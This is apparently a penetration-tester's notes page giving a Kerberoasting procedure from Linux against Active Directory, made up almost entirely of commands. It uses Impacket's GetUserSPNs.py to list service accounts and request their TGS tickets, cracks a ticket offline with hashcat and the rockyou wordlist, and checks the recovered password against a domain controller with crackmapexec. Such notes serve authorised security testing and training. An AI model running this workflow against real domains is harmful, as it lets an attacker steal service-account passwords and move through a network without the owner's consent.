> For the complete documentation index, see [llms.txt](https://strange-1.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://strange-1.gitbook.io/notes/active-directory/kerberoasting/linux.md).

# Linux

## **Kerberoasting with** [**GetUserSPNs.py**](http://GetUserSPNs.py)

```bash
# Installing Impacket using Pip
# <https://github.com/SecureAuthCorp/impacket> 
sudo python3 -m pip install .

# Listing SPN Accounts with GetUserSPNs.py
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren

# Requesting all TGS Tickets
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren -request

# Requesting a Single TGS ticket
GetUserSPNs.py -dc-ip 10.10.10.10 DOMAIN.LOCAL/eren -request-user sqldev -outputfile sqldev_tgs

# Cracking the Ticket Offline with Hashcat
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

# Testing Authentication against a Domain Controller
sudo crackmapexec smb ip -u eren -p pass
```
